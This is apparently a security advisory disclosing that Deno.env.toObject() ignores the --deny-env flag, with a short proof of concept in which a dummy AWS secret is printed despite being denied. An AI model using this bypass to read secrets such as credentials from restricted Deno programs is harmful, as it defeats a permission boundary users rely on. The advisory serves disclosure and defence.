Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables

Summary

The Deno.env.toObject method ignores any variables listed in the --deny-env option of the deno run command. When looking at the documentation of the --deny-env option this might lead to a false impression that variables listed in the option are impossible to read.

PoC

export AWS_SECRET_ACCESS_KEY=my-secret-aws-key

# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -

# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -

The first example using get exits with the following error:

error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
                     ^
    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
    at file:///$deno$stdin.mts:1:22

The second example using toObject prints all environment variables:

[Object: null prototype] {
  ...
  AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
  ...
}

Impact

Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables

Package

Affected versions

Patched versions

Description

Summary

PoC

Impact

Severity

CVE ID

Weaknesses

Credits